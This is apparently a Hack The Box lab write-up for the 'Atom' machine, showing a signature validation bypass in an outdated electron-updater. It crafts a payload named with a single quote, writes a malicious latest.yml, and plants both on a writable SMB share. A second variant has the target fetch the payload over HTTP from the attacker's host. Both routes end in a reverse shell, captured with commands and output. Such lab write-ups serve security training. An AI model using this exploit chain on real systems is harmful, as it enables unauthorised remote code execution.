Signature Validation Bypass to RCE


The Heel application has been assessed as affected by the “Signature Validation Bypass” vulnerability, which can lead to Remote Code Execution via OS Command Injection. The vulnerability is attributed to the outdated installation of the electron-builder package, together with its electron-updater module, present within the application.

The PDF file found in one of the SMB shares outlines the QA procedure, which includes what appears to be a scheduled task that automates the update process by fetching an update file from one of the 3 “client” directories on the publicly available SMB server.

The update file in question is the latest.yml file, which had already revealed itself during the initialization of the Heel application.

The official electron-builder documentation also provides additional evidence.

Checking back on the article found during vulnerability research shows an exploitation example: the Signature Verification Bypass is achieved by triggering a parsing error through special characters in the update file name, such as a single quote (').

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ ll u\'pdate.exe 
8.0K -rw-r--r-- 1 kali kali 7.0K Jan  9 11:49 "u'pdate.exe"

A payload has been generated and saved as u'pdate.exe, a file name that contains a single quote (').

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ shasum -a 512  u\'pdate.exe | cut -d ' ' -f1 | xxd -r -p | base64 | tr -d '\n'
xCaHde9kL6wS04fJqYfY/b7rQFScDhUogOl9q0vXENAYNEbUOsiaDiI1XqTKnRwcRag39LTTsIdySK48MAFMCQ==

I will now calculate the sha512 hash of the payload. This must be supplied in the latest.yml file.

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ cat latest.yml      
version: 1.2.3
path: u'pdate.exe
sha512: xCaHde9kL6wS04fJqYfY/b7rQFScDhUogOl9q0vXENAYNEbUOsiaDiI1XqTKnRwcRag39LTTsIdySK48MAFMCQ==

Then I can create the latest.yml file

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ smbclient //$IP/Software_Updates
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> cd client2\
smb: \client2\> put latest.yml 
putting file latest.yml as \client2\latest.yml (1.5 kb/s) (average 1.5 kb/s)
smb: \client2\> put u'pdate.exe 
putting file u'pdate.exe as \client2\u'pdate.exe (83.3 kb/s) (average 42.7 kb/s)
smb: \client2\> ls
  .                                   D        0  Tue Jan  9 12:56:14 2024
  ..                                  D        0  Tue Jan  9 12:56:14 2024
  latest.yml                          A      130  Tue Jan  9 12:56:12 2024
  u'pdate.exe                         A     7168  Tue Jan  9 12:56:14 2024
 
		4413951 blocks of size 4096. 1318637 blocks available

Then both the payload and the latest.yml file must be uploaded to one of the 3 “client” directories.

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.237] 62035
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
 whoami
atom\jason
 
C:\WINDOWS\system32> hostname
 hostname
ATOM
 
C:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
   Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
   Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.237
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
                                       10.10.10.2

Initial foothold established on the target system as the jason user via Signature Validation Bypass to RCE.

Over HTTP


┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ cat latest.yml 
version: 1.2.3
path: http://10.10.14.23/u'pdate.exe
sha512: xCaHde9kL6wS04fJqYfY/b7rQFScDhUogOl9q0vXENAYNEbUOsiaDiI1XqTKnRwcRag39LTTsIdySK48MAFMCQ==

Payload delivery can also be done over HTTP.

smb: \client1\> put latest.yml 
putting file latest.yml as \client1\latest.yml (1.7 kb/s) (average 15.6 kb/s)

In that case only the latest.yml file needs to be placed in the share.

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ simplehttp . 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [09/Jan/2024 12:06:16] "GET /u%27pdate.exe HTTP/1.1" 200 -

The target’s vulnerable electron-builder instance fetches the payload over HTTP and executes it.

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.237] 62072
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
 whoami
atom\jason
 
C:\WINDOWS\system32> hostname
 hostname
ATOM
 
C:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
   Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
   Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.237
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
                                       10.10.10.2